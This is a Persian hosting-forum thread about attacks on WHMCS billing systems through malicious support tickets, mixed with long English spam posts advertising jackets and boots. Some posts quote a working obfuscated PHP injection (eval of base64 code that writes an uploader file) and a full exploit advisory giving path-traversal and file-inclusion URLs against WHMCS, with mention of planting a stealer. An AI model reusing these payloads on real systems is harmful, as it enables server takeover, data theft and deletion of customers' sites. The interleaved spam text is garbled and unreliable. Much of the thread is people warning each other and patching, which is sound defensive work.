و در مرحله بعد غیر فعال کردن فایل تیکت(ضروری نیست اما برای اطمینان چون با مراحل بالا مشکل موقتا رفع میشود) و بررسی اسیپ پذیری ایجاد شده خوشحال میشم جزییات کار و فایل اسیپ پذیر رو در اختیارم بذاریدتا
ضعف بررسی شه
Email:Ehsan.Empire@att.net

سلام دوستان
من هم به همین روش ذکر شده هک شدم ، آی پی هکر 83.244.46.125 بوده ، البته من اصلا این این تیکت رو باز نکردم ،
ولی به هر روشی بوده یک ساعت بعد از ارسال تیکت تونسته رمز plesk رو تغییر بده و وارد کنترل پنل شده و تک تک سایت ها و یوزر ها رو حذف کرده ، ( لاگ plesk نشون میده که حدودا نیم ساعت روی سرور بوده )
دو روز قبلش همچین تیکت ارسال شده بود ولی اتفاقی نیافتاده.
ضمنا من تمام تنظیمات و اختیارات رو در حداقل ممکن برای سایت ها تنظیم کرده بودم. ساعتی هم کار کرده حدوده 2 نیمه شب بوده ، اتفاق دیگه ای هم که رخ داده این هست که با وجود اینکه پلسک گزارش داده به خاطر تکرار ثبت اشتباه رمز اکانت ادمین نیم ساعت بلاک میشه ولی اون تونسته چند ثانیه بعد دوباره چک کنه ( بیشتر از 10 ایمیل اخطار ) در 5 دقیقه ارسال شده بود.

سلام دوستان
من هم به همین روش ذکر شده هک شدم ، آی پی هکر 83.244.46.125 بوده ، البته من اصلا این این تیکت رو باز نکردم ،
ولی به هر روشی بوده یک ساعت بعد از ارسال تیکت تونسته رمز plesk رو تغییر بده و وارد کنترل پنل شده و تک تک سایت ها و یوزر ها رو حذف کرده ، ( لاگ plesk نشون میده که حدودا نیم ساعت روی سرور بوده )
دو روز قبلش همچین تیکت ارسال شده بود ولی اتفاقی نیافتاده.
ضمنا من تمام تنظیمات و اختیارات رو در حداقل ممکن برای سایت ها تنظیم کرده بودم. ساعتی هم کار کرده حدوده 2 نیمه شب بوده ، اتفاق دیگه ای هم که رخ داده این هست که با وجود اینکه پلسک گزارش داده به خاطر تکرار ثبت اشتباه رمز اکانت ادمین نیم ساعت بلاک میشه ولی اون تونسته چند ثانیه بعد دوباره چک کنه ( بیشتر از 10 ایمیل اخطار ) در 5 دقیقه ارسال شده بود.

Patch کردی ؟

نه ، ساعت یک روز چهارشنبه این اتفاق افتاده یعنی قبل از اینکه این تاپیک باز بشه احتمالا
فعلا هم که چیزی روی سرور برام باقی نذاشته

سلام باید دقیقا بعد از ارسال این تیکت میرفتید و آپلودر رو از دو پوشه ی دانلود وتکپلت سی حذف میکردید

سلام دوستان
این تاپیک رو انگار بعضی ها دارن ازش سو استفاده میکنن
بگذریم
بنطرتون با کسی که این کارو میکنه چکار میشه کرد ؟
یکی اومده هک کنه از این طریق مارو اما از آنجایی که قبلا این باگ پتچ شده بود نتونست
جالب این بود که کاربر ایرانی هم هست
با آی پی ایرانی اومده واسه هک
امروز چند تا از سایت های دوستانم از این روش هک شد
حالا شما میگید من چکار کنم ؟ یا بهتر بگم چکار میشه کرد ؟

سلام دوستان
این تاپیک رو انگار بعضی ها دارن ازش سو استفاده میکنن
بگذریم
بنطرتون با کسی که این کارو میکنه چکار میشه کرد ؟
یکی اومده هک کنه از این طریق مارو اما از آنجایی که قبلا این باگ پتچ شده بود نتونست
جالب این بود که کاربر ایرانی هم هست
با آی پی ایرانی اومده واسه هک
امروز چند تا از سایت های دوستانم از این روش هک شد
حالا شما میگید من چکار کنم ؟ یا بهتر بگم چکار میشه کرد ؟


هیچی
بشینید و بخندید بهشون. شما که پچ کردید دیگه غمی ندارید. تنها کاری که می توندی بکنید اینه که به دوستانتون هم اطلاع بدید!
تربیت کردن بچه مردم بر عهده شما نیست!

http://www.webhostingtalk.ir/f178/36106/

north face jackets (http://www.onlinenorthfacejackets.com/)
north face online (http://www.onlinenorthfacejackets.com/)You might believe the globe's first cigars were rolled in The nation, or the fact that philosophic Swedish were the initial to feel existential over tobacco smoke, but before there have been any lighters or cigarettes while in the old community, tobacco had to be brought in from your new a single. Tobacco is really a plant that is originally observed only in North and South america, where local Americans currently have cultivated that for plenty, if not necessarily thousands, associated with years.

The Local Mayans from the Mexican Yucatan peninsula mature tobacco plant life, and you can find evidence showing which they smoked it with techniques like the way all of us do now. From it has the origins around Mexico, cigarettes use distributed from group to tribe, to a north and to the south. Historians now think the very first tobacco utilization in what is currently america occurred down the banks with the Mississippi stream. And that wasn't right up until Christopher Columbus notoriously ran inside Central United states while interested in India that Europe and Asia became knowledgeable about tobacco and also its particular uses. northface (http://www.onlinenorthfacejackets.com/)

When he arrived in the Carribbean, Columbus has been apparently not really a very huge fan of your flavor of tobacco, and wasnt keen in route the men and women he encountered used this to smoke a cigarette. His mariners, though, thought the particular stuff is amazing and started to smoke it themselves. Once they returned to be able to Spain, they contributed tobacco back together and contributed it by using people back. It spread with the county enjoy wildfire. Also it wasn't before the People from france too were lighting up. Incidentally, it's from that name with the French ambassador to be able to Spain, Jean Nicot, how the scientific term for cigarette Nicotiana tabacum as well as word smoking comes.
the north face (http://www.onlinenorthfacejackets.com/)The term tobacco itself contains a disputed origins, though most people now believe that must be simply your corruption of your name to a Caribbean tropical island, Tobago. Some others contend not wearing running shoes originates coming from Tabasco, a region of Mexico.

The initial tobacco being commercially cultivated in the usa was planted while in the state with Virginia for 1612. Soon thereafter plantations popped up on Maryland along with elsewhere. At this time, people been smokers their using tobacco mostly inside pipes. It wasn't prior to the late 18th century that cigars started to be smoked in the usa. The one who is told have brought cigar smoking with the US is definitely Israel Putnam. north face outlet (http://www.onlinenorthfacejackets.com/)Putnam served within the Revolutionary War for a general, however afterwards, and much more importantly regarding posterity, he visited to Cuba and even smoked your cigars which were made now there. On returning to the PEOPLE he brought back a box of such cigars through him. Nearly overnight lighters were used everywhere along with soon cigar factories popped up, significantly in the area around Putnam's neighborhood of Hartford, Connecticut.

Cigars weren't seriously popular in Europe before Peninsula War that occurred at first of a 19th one. The troops of Great britain and People from france who conducted in Spain throughout the war cut back tobacco and pipes using them to his or her's homelands, in addition to soon, all over again, tobacco utilization in those countries was prevalent. But it was subsequently among the fashionable high classes which usually cigar smoking took carry. The Northface Jackets Online (http://www.onlinenorthfacejackets.com/womens-north-face-jackets-c-88.html)Even these days, smoking pipes is an item is from the luxury and discernment afforded to individuals with discerning tastes and the means to satisfy them. Manchester is amongst the most remarkable and energetic cities inside the North Western world of The united kingdom. It is readily available by roads, rail or perhaps plane. The location has a great deal to offer that you'll be sure to like to stay together with sample a many charm bracelets. The city posseses an eclectic mixture of the old additionally, the new this is returned in the plethora of types regarding accommodation readily available. There can be literally a huge selection of Manchester hotels from which to choose, ranging out of 5 starlet luxury for the cheap-and-cheerful price cut Manchester lodgings. There can be a Manchester hotel for every budget allowed. The North Face Jackets (http://www.onlinenorthfacejackets.com/mens-north-face-jackets-c-82.html)

The personal choice of where to start and watch in Manchester as well as surrounding space is harmonized by all of the Manchester lodgings. Manchesters night-life is usually legendary, with several popular jewelry having originated in your neighborhood. The popular music scene around Manchester will be diverse together with all seems are were made for utilizing live actions from up-and-coming operates to essential stars going down at venues all over Manchester. If you would like enjoy a really memorable day, then you really need to book into among the numerous Manchester hotels for any night based on one of many discount Stansted hotels, you might have a relaxed and well-earned rest after having a night for excitement in addition to fun.

If you want sports, then you'll be rotten for preference in Manchester. It truly can be a city with internationally well-known facilities. North Face Gloves (http://www.onlinenorthfacejackets.com/the-north-face-gloves-c-69.html)The 2002 Commonwealth Games happen to be held within Manchester and among several other benefits that has had to the city is definitely the rise with discount Stansted hotels. No matter if you should watch any sporting party or enjoy the fun yourself, Manchester lodging are properly situated that you enjoy your entire day to the actual fullest. Manchester U . s . has supporters from world wide and they often times travel very long distances to check out the basketball team. The cheap Manchester hotels are often accessible with Manchester International airport for all supporters who definitely have made any journey right from outside Great britain. discounted north face jackets (http://www.onlinenorthfacejackets.com/mens-north-face-down-jackets-c-85.html)

Manchester provides its plants roots firmly from the industrial wave. It was in the middle of the particular booming English language economy of your 18th together with 19th one hundred year. The place has most certainly not stood still since that time either. You could find historic and also modern constructions, side simply by side, from the heart with the city focus. Many worth mentioning buildings were converted in to the discount Manchester hotels for those weary criminal or deluxe accommodation for that tourist who wants to stay for two weeks. The options of Manchester hotels is without a doubt extensive. You will discover recognizable hotel room chains and also discount Stansted hotels offering rates together with availability to match into your own needs. The North Face Realization Shell Jacket (http://www.onlinenorthfacejackets.com/mens-north-face-reversible-jackets-c-83.html)

The biggest market of Manchester could be the perfect location to utilize as some sort of base for one's visit towards North Western world of The united kingdomt. If you actually stay during any on the list of discount Stansted hotels, you may have the personal choice of any manner of transport you would like to venture further out. Shuttle bus and mentor services operated regularly. Any of your Manchester hotels is able to offer everyone information in order to where that will board and additionally destinations which can be served. You may well maximize the actual savings that you've got made by keeping one of many discount Stansted hotels utilizing public transport going. Frequent practice services cost take one to any vacation spot around Stansted and further than.

Manchester has on the list of largest malls in the united states. Whether you want a distinct gift, would like to browse custom made boutiques or prefer the bargains that will found with the many economies, you will probably be able to buy until you will drop. From hard evening of taking, what could possibly be better in comparison with to relax while in the comfort of on the list of Manchester inns? If you might have busted your capacity to pay, you might still hold the rest for you to deserve in on the list of discount Manchester hotels. Almost all easily accessible from your shopping regions, either on foot, if you've still got the electric power or by means of local carry around or taxi.

You could find the regions and supply on countless sites on the net with prices including the discounted Manchester hotels to your most lavish. There is not an doubt the fact that friendly hospitality that Northerners happen to be famous for can be obtained from any with the Manchester lodges, from a 5 celeb luxury of your International chain for the value of your discount Stansted hotels. .

Other About face blog (http://www.edgefireisland.com/index.php?ch=myaccount&sc=myblog&id=0)

face (http://www.prada-sacs.com/blog)

About onlinenorthfacejackets.com blog (http://www.gxxhsd.com/uch/bbs/space.php?uid=193743)

سلام

برای ما هم فرستاند اینو
البته دیدم از فلسطین یکی اومد و هرجا میرفت چک می کردم
اومد تیکت داد و ...
همین که تیکت فرستاد بن آی پی کردم
بیچاره خودشم موند چطوری اینطوری شد!!!
اما برای من کد کوچیک بود
و اینکه طرف فلسطینی با این روش اومده بود تو سایت
توی سایت گوگل جستجو کرده بود که اون پاین Whmcs کپی رایت رو powered By WHmcs :ir
فقط سایتهای ایرانی
بعد هم که ...
خلاصه این هنوز وجود داره

سپاس

سلام.
واقعا برای این فرد که قطعا از کاربران این انجمن هست متاسفم.
*دوست عزیز(بجه عزیز) اگر با کسی مشکلی داری با خودش بیان کن نه اینکه سایت کسی را هک کنی و به خودش و فامیلش بی احترامی کنی ! و بدان که از طرف گروه میزبانی ام بی جی هاستینگ حلال نخواهی شد(البته اگر بچه هستی این مورد اثری نخواهد داشت)
ما و سایر همکاران درحال نتیجه گیری هستیم و بزودی در جهت شکایت اقدام خواهیم کرد.

ugg (http://www.apairofboots.com/)
uggs (http://www.apairofboots.com/)Wherever you could be and however a lot of an adventure you will be having, it is safe to state that no doubt you happen to be faced with challenges together with obstacles fairly often. This will be what life comprises. Some of people though seem to have knack of earning it all seem simple, while others get involved in typically the negativity on the challenge and only see problems prior to them.

Challenges might consume you any time you let these individuals. You might, on one other hand choose to pay attention to your plus points instead and discover challenges in life, that may be exactly what they can be. If people allow yourself to spotlight the difficulty on the challenge, that is after that grow in proportion, yet any time you focus with solutions for your personal dilemma, the then chances are you will uncover one and up possibilities pertaining to solving your complaint. ugg boots (http://www.apairofboots.com/)Through making an attempt times, we never want to think that the right can leave our problematic periods. But still, if most of us look back at the difficult times in the lives, whether it is about some sort of relationship, the business, a particular addiction, budgetary problems and also other. . . have most people not learned more by means of each challenge? Have most people not grown and be accepted as stronger, more compassionate everyday people?

I feel not saying that him and i need not think the severity of your challenge along with the pain it will be causing. It is critical to feel the emotion that's surfaced as a way to accept task and what it means to u . s . ugg australia (http://www.apairofboots.com/). Give you time, on the web . put against your obstacle shoes, do what you want to do about the item, do all to do and when which is done without more may be accomplished at this time, let that go in addition to trust that it can be taken care and attention. Wait and grow patient for any right time and after that take another step of progress. Do not necessarily expect that each one challenges is often solved automatically. Some will need time in addition to there always definitely seems to be a cause for this. When difficulties arise really do not think you will be being designated and disciplined. ugg boots on sale (http://www.apairofboots.com/)Challenges could be the stuff life is manufactured out of. However, how you choosed to overcome task will establish your rate of good results.

In the text of Symbol Victor Hansen, Dont put it off until everything is exactly right. It may never often be perfect. There are normally challenges, obstacles and poor conditions. Alright, so what!. UGG BOOTS OUTLE (http://www.apairofboots.com/uggs-classic-tall-5802-c-10.html)Get going now. With the help of each measure you acquire, you is going to grow more robust and tougher, more and many more skilled, increasingly successful.


. "The Just Thing We must Fear Is Fear By itself?
- In the Inaugural Tackle of Franklin Delano Roosevelt, 32nd U. S. President

Fear may be the great barrier to being successful. "What basically fail??; "What basically fall??; "What basically lose?? Remove fear and everything is kept is probability. Ugg Classic Argyle Knit Boot (http://www.apairofboots.com/ugg-classic-argyle-knit-c-7.html)Fear is really a blessing along with a curse. Having a proper fear from Crocs is a great thing if you? re considering diving into some far off billabong, however it can destroy your lifetime if this keeps you actually from achieving success.

In years past a buddy of mine visited work for the telephone provider. During their training he spent time frame at trellis climbing college. Each student was necessary to strap unique spikes onto their function boots together with use people spikes to make sure you climb way up telephone rods. He couldn? t get it done. He had been afraid of heights. Chestnut UGG (http://www.apairofboots.com/ugg-sundance-5325-c-21.html)

Every single day he might stand in the base of that 18 meter extra tall poll together with his toes would refuse to move. Gradually, over the course of a month, he managed to reach a height with 6 meters, then 9. But which was his limit. His fear refused to permit his feet to transport him every higher. The actual instructors didn? capital t harass him or her. In truth, they mainly ignored him. UGG Slipper Clearance (http://www.apairofboots.com/uggs-slippers-5304-c-4.html)

Friday came and also the instructors handed out paychecks to all the students. Nobody handed a check to my pal. When he or she asked where his pay back was, one instructor pointed towards the very top of the pole not to mention said "I nailed this up certainly, there. If you need to get compensated, you? ll need to climb up and obtain it. ? Evidentially, the need to buy food for her wife not to mention two kids was much better than his fear of heights. He retrieved his check and continued to graduate student pole hiking school not having further occurrence.

Can there be some concern that? s keeping you on the floor? Is there some achievement that can be found just beyond your reach since you? re as well afraid to climb higher enough to achieve it? If that's the case, you need to take action.
discount ugg boots women's (http://www.apairofboots.com/womens-ugg-boots-c-31.html)

Concern, and it's two companions? uncertainty as well as doubt, are powerful psychological causes that hold a lot of us back via being what we should are designed to be. However, like other things that resides solely within our own memories, we possess the power so that you can overcome such forces.

All it requires is the conscious decision to face our fears head on and have a look at what it is that we're really worried of. Once we understand the underlying reason behind the worry about, we can develop a plan in order to combat them. Here? s the way you do that:

1. Stop while using word "fear? replace it using the word "risk? rather.

two. Examine the risk you face for the strategy you are considering and think of a plan to make sure you mitigate those people risks. This? s that easy.

Once you fully understand the risks involved with your strategy, and you create a plan to minimize or cut down those challenges, your mind releases you in the grips with fear along with frees you to definitely act. Motion breeds achievement. Fear retains you back. It? s your decision. .

Other About store blog (http://www.toysblog.it/user/maricafladung)

store (http://app.redbricknetworks.com/pg/blog/ayannaseiley)

About apairofboots.com blog (http://www.digital-inn.de/members/eharttroyr-33275.html)

سلام.
واقعا برای این فرد که قطعا از کاربران این انجمن هست متاسفم.
*دوست عزیز(بجه عزیز) اگر با کسی مشکلی داری با خودش بیان کن نه اینکه سایت کسی را هک کنی و به خودش و فامیلش بی احترامی کنی ! و بدان که از طرف گروه میزبانی ام بی جی هاستینگ حلالت نخواهی شد(البته اگر بچه هستی این مورد اثری نخواهد داشت)
ما و سایر همکاران درحال نتیجه گیری هستیم و بزودی در جهت شکایت اقدام خواهیم کرد.

امروز دو تا ایمیل برام اومده بود که سایت شما هک شده بود و اخطار داده بود که اطلاعات تون رو منتقل کنید که می خواد کلیه اطلاعات رو پاک کنه.به کاربرهاتون ایمیل اطلاع رسانی بفرستید که قضیه باگ هست .اسمش رو هم نوشته بود

دوستانی که پچ کردن مشکلی ندارن
امروز چند نفر اومدن و سعی کردن که به سیستم ما نفوذ کنن ولی موفق نشدند
یکیشون ایمیل زد و عذرخواهی کرد و گفت که کد رو از اینجا برداشته !
WHMCS همیشه به محض انتشار patch، به تمامی کاربران اطلاع میده
اگر لایسنس ندارید، سعی کنید حتما تهیه کنید. بدون لایسنس ممکنه کل زحماتتون یک شبه به باد بره. باور کنید 19 دلار ماهانه، در مقابل از دست رفتن کل زحماتتون هیچی نیست. اگر قادر به پرداخت این پول نیستید، مطمئن باشید با کمی صرفه جویی میتونید این پول رو پرداخت کنید

---------- Post added at 07:52 PM ---------- Previous post was at 07:00 PM ----------

ضمنا دوستان میتونین از طریق بخش Spam Control متن کد رو بلاک کنید
اینطوری تیکتهایی که توسط افرادی که کد رو از اینجا کپی میکنن و روی سایت شما تست میکنن توسط سیستم بلاک میشه و موجب مزاحمت نمیشه
البته دقت کنید که برای رفع باگ باید سیستمتون رو پچ کنید، و این کار فقط برای جلوگیری از دریافت تیکتهای اینچنینی هستش

امروز دو تا ایمیل برام اومده بود که سایت شما هک شده بود و اخطار داده بود که اطلاعات تون رو منتقل کنید که می خواد کلیه اطلاعات رو پاک کنه.به کاربرهاتون ایمیل اطلاع رسانی بفرستید که قضیه باگ هست .اسمش رو هم نوشته بود

سلام
دیشب پس از این عمل اطلاع رسانی شد:
http://portal.mbjhosting.org/

ممنون از شما.

دوستان اطلاعات کریدیت کارت در دیتا بیس whmcs ذخیره میشه؟ :((
در کدوم تیبل ذخیره میشه؟
اگه ممکنه یخورده زودتر جواب بدید:-ss
:63:

همین کار با ما هم انجام شده
آی پی کاربری که اینکارو کرده اینه :

2.176.***.124

البته ما تیکت هایی که عنوان مناسب نداشته باشن رو نخونده پاک می کنیم اینم یکی از همون موارد ...

با تشکر از همه دوستان که تو این تاپیک شرکت کردن و ما رو راهنمایی کردن ، همچنین از استارتر بابت اطلاع رسانی ...

فرد هکر ناشی بوده و میتونید از ای پی بصورت کاملا رسمی شکایت کنید !این ای پی هم به ما اتک زده! مراحل ابیوز به سازمان مقررات شنبه طی میشه

امروز همچین تیکتی برای ما هم ارسال شد.
ولی ما قبلا نکات امنیتی رو رعایت کرده بودیم.
اون شخص از کشور اسرائیل لعنت الله علیه بود و هیچ غلطی نتونست بکنه. :))

فرد هکر ناشی بوده و میتونید از ای پی بصورت کاملا رسمی شکایت کنید !این ای پی هم به ما اتک زده! مراحل ابیوز به سازمان مقررات شنبه طی میشه

نیاز به حمایت یا تأیید بود ، روی ما حساب کنید

دوستان اطلاعات کریدیت کارت در دیتا بیس whmcs ذخیره میشه؟ :((
در کدوم تیبل ذخیره میشه؟
اگه ممکنه یخورده زودتر جواب بدید:-ss
:63:

از این مسیر برید:
Setup > Security > Disable Credit Card Storage

اگه دیسیبل باشه مشکلی نیست.

دقیقا این تاپیک شده دغدغه!
یاد گرفتن هر روز میاد با آی پی خود ایران تیکت میزنه و عنوانش رو کد شده میذاره هر چند که قبل از اینکه تیکت رو بخونیم محتوی اون را با ایمیل چک میکنیم
بهترین راه محدودیت در تعداد کارکتر عنوان هست

دقیقا این تاپیک شده دغدغه!
یاد گرفتن هر روز میاد با آی پی خود ایران تیکت میزنه و عنوانش رو کد شده میذاره هر چند که قبل از اینکه تیکت رو بخونیم محتوی اون را با ایمیل چک میکنیم
بهترین راه محدودیت در تعداد کارکتر عنوان هست

مطمئن باشید یک هکر حرفه ای چنین کاری نمیکنه و باز هم مطمئن باشید که اونایی که تیکت میزنن، کد رو از همین تاپیک برداشتن، یک نفر هم نیستند، چند نفرن، یک عده بچه که با دیدن این کد و این تاپیک فکر کردن دیگه هکر شدن
همونطور که در بالا گفتم، برای جلوگیری از دریافت این نوع تیکتها، بعد از اینکه پچ رو ریختید، کد رو در قسمت Spam Control بلاک کنید تا دیگه چنین تیکتهایی بدستتون نرسه

بله واقعا من از زدن این تیکت شدیدا ناراحتم
فکر کنم الان همه ایرانی ها هکر شدن
از مدیر میخوام تیکت رو حذف کنه
یا لااقل پست هایی که یه جورایی آموزش داده

اگه امنیتتون خوب باشه هیچ مشکلی پیش نمیاد.
بزارید اینقدر تیکت بزنن تا جر بخورن.
شما چرا اینقدر گندش کردین این قضیه رو آخه.
این تاپیک بهتره که به تاریخ پیوسته بشه.

با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم

با سلام میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه! به نظر من کار خوبی میکنه هر کی هک کرده چون طرف هیچ وقت نمیفهمید که سایتش باگ داره بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه خدایی هرکی بوده دمش گرم



اولا خیلی از دوستان لایسنس خریدند

دوما اگه هکر نیت مثبتی داره، میتونه به مدیریت اون وبسایت اعلام کنه که سیستمش باگ داره

تایید میکنم
من خودم اولین کسی بودم که فهمیدن این آپلودر کجا و چه طور باز میشه میتونید تاپیکو بینید اما با موبایل شخصیم به چندین شرکت تماس گرفتم و باگ رو گفتم
در ضمن کسی که واسه خود و مشتری هاش ارزش قائل باشه از نال استفاده نمیکنه

با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم

خیلی از سایت های خارجی و ایرانی که لایسنس داشتند نیز هک شده اند !

همکارانی که هک نشده اند هم می توانند شکایت کنند ؟

ولی 90 درصد اشخاصی بودند که نال شده استفاده کردند تا لایتکس

الان یه نفر تیکت داد

کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}
اهمیت: Medium
محتوای سوال
=============================
hi

----------------------------
IP Address: 46.19.139.252

الان یه نفر تیکت داد

کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

اهمیت: Medium

محتوای سوال

=============================
hi

----------------------------
IP Address: 46.19.139.252



خوب از بخش Spam Control متن کد رو بلاک کنید

هم باگ رفع شده
هم پوشه های دانلود و تمپلت و ... درد دسترس نیس
الان با آیپیش میتونم شکایت کنم؟
مشهدیه

---------- Post added at 06:09 PM ---------- Previous post was at 06:07 PM ----------

وای خدا این مشتریمه
الان کل هاست هاشو دلیت میزنم:-p

---------- Post added at 06:15 PM ---------- Previous post was at 06:09 PM ----------

takfile22@yahoo.com
اینم ایمیلش

هم باگ رفع شده
هم پوشه های دانلود و تمپلت و ... درد دسترس نیس
الان با آیپیش میتونم شکایت کنم؟
مشهدیه

---------- Post added at 06:09 PM ---------- Previous post was at 06:07 PM ----------

وای خدا این مشتریمه
الان کل هاست هاشو دلیت میزنم:-p

جون شما گفتی مشهدیه فکر کنم همونیه که فکرش رو میکنم

---------- Post added at 06:21 PM ---------- Previous post was at 06:17 PM ----------

دوست من این نیست ببین خاسته شوخی بکنه باهات
به دل نگیر

بهتره یک تاپیک ایجاد بشه و آی پی و ایمیل هکران رو اعلام کنیم تا همه مسدود کنند

من که اعلام کردم الان نصف ایران هکر این سیستم هستند:((

عزیزم یه مسئله کوچیک رو این همه بزرگش که نمیکنند
اگه اون شخصم هکر باشه با ای پی واقعی وارد سیستم نمیشه بهتره جای این کارا باگای تو سیستمتون رو برطرف کنید دوستان عزیز
نه اینکه به فکر انتقام باشی

نتونست کاری کنه که باگ ها هم بر طرف شده
سیستمم هم لایسنس داره و خدا رو شکر من اولین نفری بودم که هک شدم و منو همون بچه ی عرب هک کرد
من یه اشتباه کردم اینجا تاپیک زدم و آموزش دادم که چه جوری عمل میکنه تا بچه ها باگو ببندن اما هر کی این تاپیکو خوند هکر شد
از مدیرا میخوام تاپیک حذف بشه
یا پست هایی که جوری آموزشیست

---------- Post added at 06:48 PM ---------- Previous post was at 06:44 PM ----------

الان همه هکر شدن شما چه طور؟

بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:


$b0x# WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability !
$b0x# ZxH-Labs
$b0x# 1st-NOV-11
$b0x# Www.Sec4ever.coM
$b0x# WH-03 On Windows IIS 6.0

================================================== ======
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure

Files : Submitticket.php , Downloads.php

-> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

-I : reports.php?report=[LFI]%00
EX : admin/reports.php?report=../../../../../../../boot.ini%00

You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
-FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
================================================== ======
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3 And All Q8'z

./b0x

------------------------------------
کل کدي که اينجکت ميشه در تيکت ها( با توجه به ارسال maryam1) اين هست:


<?php
